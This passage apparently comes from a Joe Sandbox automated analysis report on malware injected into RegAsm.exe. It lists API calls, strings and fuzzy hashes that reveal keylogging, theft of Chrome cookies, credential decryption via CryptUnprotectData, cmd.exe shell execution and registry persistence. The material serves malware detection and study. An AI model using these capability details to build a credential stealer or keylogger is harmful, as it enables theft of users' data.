                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                            • String ID: XQG$NG$PG
                            • API String ID: 1634807452-3565412412
                            • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                            • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                            • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                            • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                            • _free.LIBCMT ref: 10004CE8
                            • _free.LIBCMT ref: 10004CF2
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            • API String ID: 2506810119-1068371695
                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                            • _free.LIBCMT ref: 004435E0
                            • _free.LIBCMT ref: 004435EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            • API String ID: 2506810119-1068371695
                            • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                            • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                            • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                            • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$0NG
                            • API String ID: 368326130-3219657780
                            • Opcode ID: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                            • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                            • Opcode Fuzzy Hash: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                            • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                            APIs
                            • SystemParametersInfoW.USER32 ref: 0041CB68
                              • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                              • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                              • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                            • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                            • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                            • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                            APIs
                            • _wcslen.LIBCMT ref: 00416330
                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                              • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                              • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                              • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen$CloseCreateValue
                            • String ID: !D@$okmode$PG
                            • API String ID: 3411444782-3370592832
                            • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                            • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                            • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                            • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                            APIs
                              • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C63E
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                            • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                            • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                            • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                            APIs
                              • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C70D
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                            • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                            • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                            • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                            • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                            • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                            • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                            • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                            • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                            APIs
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                            • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                            • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                            • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                            • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                            APIs
                            • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                            • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32
                            • API String ID: 2574300362-2380590389
                            • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                            • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                            • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                            • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                            • CloseHandle.KERNEL32(?), ref: 004051CA
                            • SetEvent.KERNEL32(?), ref: 004051D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                            • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                            • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                            • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 2005118841-1866435925
                            • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                            • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                            • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                            • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                            • RegSetValueExW.ADVAPI32 ref: 00413888
                            • RegCloseKey.ADVAPI32(?), ref: 00413893
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                            • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                            • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                            • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                            • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                            • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                            • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeHandleLibraryModule
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 662261464-1276376045
                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                            APIs
                              • Part of subcall function 10007153: GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                              • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                              • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                              • Part of subcall function 10007153: _free.LIBCMT ref: 100071B8
                              • Part of subcall function 10007153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                            • _free.LIBCMT ref: 10004F1D
                            • _free.LIBCMT ref: 10004F24
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                            • String ID: 8 V$8 V
                            • API String ID: 400815659-2763740980
                            • Opcode ID: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                            • Instruction ID: eaf7f0aa003ddc14549942adb29436a4b3c466950eec5de4e21d931d64d8bd94
                            • Opcode Fuzzy Hash: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                            • Instruction Fuzzy Hash: 7BE0E5A6A0D99291F261D23D7D4265E1B45CBC12F5B230226FC249B1CBDDA4D801109D
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                            • ShowWindow.USER32(00000009), ref: 00416C9C
                            • SetForegroundWindow.USER32 ref: 00416CA8
                              • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                              • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                              • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                              • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                            • String ID: !D@
                            • API String ID: 186401046-604454484
                            • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                            • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                            • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                            • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                            • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                            • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                            • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                            APIs
                            • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                            • UnhookWindowsHookEx.USER32 ref: 0040B902
                            • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                            • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                            • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                            • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                            • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                            • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                            • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                            Strings
